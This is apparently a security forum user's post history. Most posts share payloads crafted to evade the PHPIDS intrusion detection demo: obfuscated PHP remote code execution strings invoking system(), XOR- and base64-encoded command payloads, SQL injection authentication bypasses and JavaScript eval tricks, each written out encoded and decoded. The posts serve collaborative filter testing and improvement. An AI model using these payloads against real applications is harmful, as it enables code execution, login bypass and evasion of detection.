sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
For any nonsense or banter that doesn't fit anywhere else. LoL! omg! ROFL! 

Current Page: 1 of 18
Results 1 - 30 of 539
5 years ago
tx
Perhaps I missed something in your post, but it seems that you are just renaming clickjacking.
Forum: News and Links
5 years ago
tx
This was awesome, ascii art spam! Beautiful dreamerawake unto me gg gg gg g gg gg gg ggg ggggg gggggg ggg
Forum: OMG Ponies
5 years ago
tx
@rvdh: lol
Forum: OMG Ponies
5 years ago
tx
Good stuff, I've been enjoying your opera write ups.
Forum: Full Disclosure
5 years ago
tx
S P A M
Forum: Networking
5 years ago
tx
yeah, I've got nothing here...
Forum: Intro
6 years ago
tx
@.mario: link me, I wanna play ! :)
Forum: Projects
6 years ago
tx
@fragge: PHPIDS isn't supposed to filter anything. It only detects and then assigns it an impact value. Based on that value certain actions can be triggered.
Forum: Projects
6 years ago
tx
thornmaker Wrote:
> An injection can be massaged to have any [\w\s] to [^\w\s] ratio needed... I just don't see that approach ever working.
> $xxxxxxx=.1.eval,$xxxxxxx($xxxxxxx('na'+status+('me'),1))
@thornmaker: I have the feeling you're probably right. But I wonder, what about looking at unique "words"
Forum: Projects
6 years ago
tx
@thornmaker: nice find!:)
Forum: Projects
6 years ago
tx
I wanted to see how phpids handled some recent stuff from milw0rm, so for fun: RCE http://milw0rm.com/exploits/4851 Caught, score: 19 http://milw0rm.com/exploits/4849 Not caught. vector: ?test=@phpinfo();@ LFI http://milw0rm.com/exploits/4876 Caught, score: 15 SQLi http://milw0rm.com/exploits/4867 Caught, score: 32 http://milw0rm.com/exploits/4863 Caught, score: 14 4 out of 5, not bad :)
Forum: Projects
6 years ago
tx
@Gareth,.mario: thx :) I've got another. This is a variation on DoctorDan's vector, shortened to sneak under the centrifuge, which required a few other minor changes: http://demo.phpids.org/?test=%5B%24y%3D%28%27al%27%29%5D%26%5B%24z%3D%24y+%27ert%27%5D%5Ba%3D%281%3F/ev/%3A0%29%5B-1%5D+%24y%5D%28%24z%29%281%29 [$y=('al')]&[$z=$y+'ert']+$y]($z)(1) Only tested in FF2, I don't know if it wor
Forum: Projects
6 years ago
tx
This was super hard to sneak under the centrifuge: http://demo.php-ids.org/?test=%22%3B%20e%7C%24a%3D%26%24_GET%3B%200%7C%24b%3D%21a%20.%24a%5Bb%5D%3B%24a%5Ba%5D%28%60%24b%60%29%3B// ?test="; e|$a=&$_GET; 0|$b=!a .$a;$a(`$b`);// Even shorter: ?test="; e|$a=&$_GET; $a(`$a`);// The code executes $_GET['a'](`$_GET['b']`) as in http://localhost/rce.php ?eval="; e|$a=&$_GE
Forum: Projects
6 years ago
tx
Multiple semicolons break the comment regex: http://demo.php-ids.org/?test=%22%3B%3B%20//%0A%20if%20%28%21%28%24_b%5B%5D++%251%29%29%20%24_a%5B0%5D%20%20%3D%20system%3B%0A%24_a%5B0%5D%28%21a.%20%22ls%22%29%3B%20%20// ?test=";; // if (!($_b[]++%1)) $_a[0] = system; $_a[0](!a. "ls"); // Similar variation: http://demo.php-ids.org/?test=%22%3B%3B//%0Aif%281%29%24_a%5B0%5D%3Dsys
Forum: Projects
6 years ago
tx
More php code execution, this time with non-alpha non digit: http://demo.php-ids.org/?test=%22%3B//%0A%20%24%7F%3Dphpinfo%3B%20%24%7F%28%29%3B%20// This uses chr(0x7f):?test=";// $=phpinfo; $(); // php allows chars 0x7f-0xff as valid in variable names, meaning this works: http://demo.php-ids.org/?test=%22%3B//%0A%20%24%7f%c9%e0%3Dphpinfo%3B%20%24%7f%c9%e0%28%29%3B%20// so far 0x7f is t
Forum: Projects
6 years ago
tx
@.mario: nice fix. I've got a slight variant: http://demo.php-ids.org/?test=%22%3B//%0A%20if%20%28%21%28%24_b%5B%5D%2b%2b%251%29%29%20%24_a%5B0%5D%20%20%3D%20system%3B%0A%24_a%5B0%5D%28%20%22ls%22%29%3B%20%20// ";// if (!($_b[]++%1)) $_a[0] = system; $_a[0]( "ls"); // EDIT: encoded '+'
Forum: Projects
6 years ago
tx
More PHP RCE: http://demo.php-ids.org/?test=%22%3B%7Bif%20%28true%29%20%24_a%5B%5D%20%20%3D%20system%3B%0A%24_a%5B0%5D%28%20%22ls%22%29%3B%20%7D%20// ";{if (true) $_a[] = system; $_a[0]( "ls"); } // ";{if (1) $_a[] = system; $_a[0]( "ls"); } // Other ways of getting 'true' http://demo.php-ids.org/?test=%22%3B%7Bif%20%28%21%28%24_b%5B%5D%2b%2b%251%29%29%20%24_a
Forum: Projects
6 years ago
tx
variations on thornmaker's alerts from the other day http://demo.phpids.org/?test=x%3D%21/x/%3F/x/-%2bd%3Aalert%0Ax%280%29 : ?test=x=!/x/?/x/-+d:alert x(0)?test=x=!#0={}?/x/-+x:alert x(0)?test=x=!disableExternalCapture?/x/-+text_goes_here:alert x(0) They can all be extended pretty much the same way for DoctorDan's alerts http://demo.phpids.org/?test=x%3D%21/%5C%5C/%3F%7B%7D%2B1-1%3Aalert%0ax%2
Forum: Projects
6 years ago
tx
I'm still working on my regex prowess but I believe that is +{any character except 's' or ':'}:{any character except 's' or '='}= Example: +a:b= or to give a better example +$b:a $b= and +$b:a $a= in a=/x/ $b=!!1e1?'ash':a $b=!!1e1?'ion.h'+$b:a $b=!!1e1?'locat'+$b:a $a=!1e1?!1e1:eval a.a=$a $b=a.a($b) $b=a.a($b) @.mario: why [^s], btw?
Forum: Projects
7 years ago
tx
Hey .mario, Auth Bypass MATCH...AGAINST Variations http://demo.php-ids.org/?test=%27%20or%20MATCH%20username%20AGAINST%20%28%27%2badmin%20-a%27%20IN%20BOOLEAN%20MODE%29%3B%20--%20-a : ?test=' or MATCH username AGAINST ('+admin -a' IN BOOLEAN MODE); -- -a ?test=' or MATCH username,password AGAINST ('+admin -a' IN BOOLEAN MODE); -- -a ?test=' or MATCH username AGAINST ('admin' IN BOOLEAN MODE)
Forum: Projects
7 years ago
tx
.mario, This is still undetected: http://demo.php-ids.org/?test=%27%20or%20MATCH%20%28username%29%20AGAINST%20%28%27+admin%20-asds%27%20IN%20BOOLEAN%20MODE%29%3B%20--%20-a ?test=' or MATCH (username) AGAINST ('+admin -asds' IN BOOLEAN MODE); -- -a
Forum: Projects
7 years ago
tx
@.mario: That's catching just about everything now. Just one more: http://demo.php-ids.org/?test=%22%3B//%0A%7B%20if%20%28%21%22%7D%22%29%7B%0A%3B%0A%7Delse%7B%20%24_a%20%20%3D%20%21%22%29%22%20.%20str_replace%28%22%21%22%2C%22%22%2C%22s%21y%21s%21t%21e%21m%21%22%29%3B%20//%0A%24_a%28%20%22dir%22%29%3B%20%7D%7D%20// ?test=";// { if (!"}"){ ; }else{ $_a = !")" . str_r
Forum: Projects
7 years ago
tx
@.mario: Great fixes again, you're making this nice and fun. I can only tip my hat to your regex prowess... it's a lot easier for me to get around these rules than it would be for me to write them! *tips hat* Anyway, the (?:<[?%](?:php)?.*(?:[?%]>)?)|(?:;\s*\$\w+\s*=)|(?:\$\w+\s*=(?:(?:\s*\$?\w+\s*[(;])|\s*".*")) rule can be circumvented by prepending a null value to the string/
Forum: Projects
7 years ago
tx
blah, blah, blah, another variation. I was thinking about sirdarckcat and eval'ing document.location. Pretty much the concept that there is certain data that isn't likely to be checked (either due to possibility or context), i.e. in the case of javascript the post hash characters, and in this case, certain variables. This is related to the Register Globals=On vector, which has damn near infinite pos
Forum: Projects
7 years ago
tx
@.mario: The filters are getting really challenging now. Here's some variations on a PHPi that Reiners posted yesterday: http://demo.php-ids.org/?test=%22%3B%7B%20if%20%28true%29%20%24_a%20%20%3D%20%22%22%20.%20strtolower%28%22pass%22%29%3B%0Aif%20%20%20%281%29%20%24_a.%3D%20%22%22%20.%20strtolower%28%22thru%22%29%3B%20%0A%24_a%28%20%22dir%22%29%3B%20%7D%20// ?test=";{ if (true) $_a = &
Forum: Projects
7 years ago
tx
Variation, XOR'd payload :) http://demo.php-ids.org/?test=%22%3B%20%0Adefine%20%28%20_a%2C%20%220008avwga000934mm40re8n5n3aahgqvaga0a303%22%29%20%3B%0Aif%20%20%28%20%210%29%20%24c%20%3D%20USXWATKXACICMVYEIkw71cLTLnHZHXOTAYADOCXC%20%5E%20_a%3B%0Aif%20%20%28%20%210%29%20system%28%24c%29%20%3B// ?test="; define ( _a, "0008avwga000934mm40re8n5n3aahgqvaga0a303") ; if ( !0) $c = USXW
Forum: Projects
7 years ago
tx
Another remote command/code execution in php: http://demo.php-ids.org/?test=%22%20%3B%20%20%0Adefine%20%28%20_a%20%2C%20%27ls%20-la%27%29%3B%0Aif%20%20%28%210%29%20%20%20%20%24_a%3D%22%22._a%3B%0Aif%20%28%210%29%20print%28%60%24_a%60%29%3B%0A// ?test=" ; define ( _a , 'ls -la'); if (!0) $_a=""._a; if (!0) print(`$_a`); // With base64 payload http://demo.php-ids.org/?
Forum: Projects
7 years ago
tx
@.mario: Excellent and timely fixes, once again. :) @thornmaker: thx! Function call (phpinfo) can be bypassed as follows: http://demo.php-ids.org/?test=%22%3B%20define%28_a%2C%27phpinfo%27%29%3B%20if%20%20%281%29%20%24_a%3D_a%3B%20%24_a%281%29%3B// ?test="; define(_a,'phpinfo'); if (1) $_a=_a; $_a(1);//
Forum: Projects
7 years ago
tx
I figure I've got to lay off the SQL for a bit, especially if we're gonna have a contest, so: Remote code injection (php5): http://demo.php-ids.org/?test=%22%3B%20%24_a%3D%28%21%20%27a%27%29%20.%20%22php%22%3B%20%24_a.%3D%28%21%20%27a%27%29%20.%20%22info%22%3B%0A%24_a%281%29%3B%20%24b%3D%22 ?test="; $_a=(! 'a') . "php"; $_a.=(! 'a') . "info"; $_a(1); $b=" EDIT:
Forum: Projects
7 years ago
tx
I just thought of these variants on the way to the store (inspired by Reiners' recent vectors): http://demo.php-ids.org/?test=%27%20COALESCE%28%27admin%27%29%20and%20@@version%20NOT%20BETWEEN%20%211%20div%201%20%27 ?test='+COALESCE('admin') and @@version NOT BETWEEN !1 div 1+' tons of options here: ?test='+COALESCE('admin') and @@version NOT BETWEEN !@@version div @@version+' For fun: ?test='+CO
Forum: Projects